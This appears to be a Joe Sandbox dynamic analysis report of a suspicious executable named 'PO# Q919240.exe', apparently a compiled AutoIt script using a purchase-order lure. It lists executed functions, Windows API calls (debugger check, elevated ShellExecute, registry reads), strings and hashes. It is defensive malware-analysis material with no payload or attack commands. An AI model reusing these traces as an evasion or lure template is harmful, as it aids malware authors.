88510->88511 88512 429630 88511->88512 88513 40ca87 88511->88513 88512->88513 88514 429639 88512->88514 88519 41130a 51 API calls __cinit 88513->88519 88525 4432c0 57 API calls 88514->88525 88516 429641 88526 44b6ab CreateThread 88516->88526 88518 42964f CloseHandle 88518->88513 88519->88484 88520->88487 88521->88489 88522->88501 88523->88503 88524->88507 88525->88516 88526->88518 88527 44b5cb 58 API calls 88526->88527 88528 425b6f 88533 40dc90 88528->88533 88532 425b7e 88534 40bc70 52 API calls 88533->88534 88535 40dd03 88534->88535 88542 40f210 88535->88542 88537 426a97 88539 40dd96 88539->88537 88540 40ddb7 88539->88540 88545 40dc00 52 API calls 2 library calls 88539->88545 88541 41130a 51 API calls __cinit 88540->88541 88541->88532 88546 40f250 RegOpenKeyExW 88542->88546 88544 40f230 88544->88539 88545->88539 88547 425e17 88546->88547 88548 40f275 RegQueryValueExW 88546->88548 88547->88544 88549 40f2c3 RegCloseKey 88548->88549 88550 40f298 88548->88550 88549->88544 88551 40f2a9 RegCloseKey 88550->88551 88552 425e1d 88550->88552 88551->88544

                Executed Functions

                Function 0040D590 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144windowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO# Q919240.exe,00000104,?), ref: 00401F4C
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\PO# Q919240.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                  • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                  • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                  • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                  • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                • String ID: C:\Users\user\Desktop\PO# Q919240.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                • API String ID: 2495805114-200005380
                • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1020 427693-427696 1015->1020 1021 427688-427691 1015->1021 1019 4276b4-4276be 1016->1019 1022 427625-427629 1017->1022 1023 40e59c-40e59f 1017->1023 1036 40e5ec-40e60c 1018->1036 1037 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1037 1038 4276c6-4276ca GetSystemInfo 1019->1038 1020->1019 1027 427698-4276a8 1020->1027 1021->1019 1029 427636-427640 1022->1029 1030 42762b-427631 1022->1030 1025 40e5a5-40e5ae 1023->1025 1026 427654-427657 1023->1026 1032 40e5b4 1025->1032 1033 427645-42764f 1025->1033 1026->1018 1031 42765d-42766f 1026->1031 1034 4276b0 1027->1034 1035 4276aa-4276ae 1027->1035 1029->1018 1030->1018 1031->1018 1032->1018 1033->1018 1034->1019 1035->1019 1039 40e612-40e623 call 40efd0 1036->1039 1040 4276d5-4276df GetSystemInfo 1036->1040 1037->1036 1047 40e5e8 1037->1047 1038->1040 1039->1038 1046 40e629-40e63f call 40ef90 GetNativeSystemInfo 1039->1046 1050 40e641-40e642 FreeLibrary 1046->1050 1051 40e644-40e651 1046->1051 1047->1036 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                APIs
                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                • FreeLibrary.KERNEL32(?), ref: 0040E642
                • FreeLibrary.KERNEL32(?), ref: 0040E654
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                • String ID: 0SH
                • API String ID: 3363477735-851180471
                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                Download Yara Rule
                APIs
                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: IsThemeActive$uxtheme.dll
                • API String ID: 2574300362-3542929980
                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                Download Yara Rule
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                • TranslateMessage.USER32(?), ref: 00409556
                • DispatchMessageW.USER32(?), ref: 00409561
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Message$Peek$DispatchSleepTranslate
                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                • API String ID: 1762048999-758534266
                • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO# Q919240.exe,00000104,?), ref: 00401F4C
                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                • __wcsicoll.LIBCMT ref: 00402007
                • __wcsicoll.LIBCMT ref: 0040201D
                • __wcsicoll.LIBCMT ref: 00402033
                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                • __wcsicoll.LIBCMT ref: 00402049
                • _wcscpy.LIBCMT ref: 0040207C
                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO# Q919240.exe,00000104), ref: 00428B5B
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\PO# Q919240.exe$CMDLINE$CMDLINERAW
                • API String ID: 3948761352-3249640725
                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock$_fseek_wcscpy
                • String ID: D)E$D)E$FILE
                • API String ID: 3888824918-361185794
                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                • __wsplitpath.LIBCMT ref: 0040E41C
                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                • _wcsncat.LIBCMT ref: 0040E433
                • __wmakepath.LIBCMT ref: 0040E44F
                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                • _wcscpy.LIBCMT ref: 0040E487
                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                • _wcscat.LIBCMT ref: 00427541
                • _wcslen.LIBCMT ref: 00427551
                • _wcslen.LIBCMT ref: 00427562
                • _wcscat.LIBCMT ref: 0042757C
                • _wcsncpy.LIBCMT ref: 004275BC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                • String ID: Include$\
                • API String ID: 3173733714-3429789819
                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • _fseek.LIBCMT ref: 0045292B
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                • __fread_nolock.LIBCMT ref: 00452961
                • __fread_nolock.LIBCMT ref: 00452971
                • __fread_nolock.LIBCMT ref: 0045298A
                • __fread_nolock.LIBCMT ref: 004529A5
                • _fseek.LIBCMT ref: 004529BF
                • _malloc.LIBCMT ref: 004529CA
                • _malloc.LIBCMT ref: 004529D6
                • __fread_nolock.LIBCMT ref: 004529E7
                • _free.LIBCMT ref: 00452A17
                • _free.LIBCMT ref: 00452A20
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                • String ID:
                • API String ID: 1255752989-0
                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                • RegisterClassExW.USER32(00000030), ref: 004104ED
                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                • ImageList_ReplaceIcon.COMCTL32(00A623D8,000000FF,00000000), ref: 00410552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                • API String ID: 2914291525-1005189915
                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                • LoadIconW.USER32(?,00000063), ref: 004103C0
                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                • RegisterClassExW.USER32(?), ref: 0041045D
                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A623D8,000000FF,00000000), ref: 00410552
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                • String ID: #$0$AutoIt v3
                • API String ID: 423443420-4155596026
                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _malloc
                • String ID: Default
                • API String ID: 1579825452-753088835
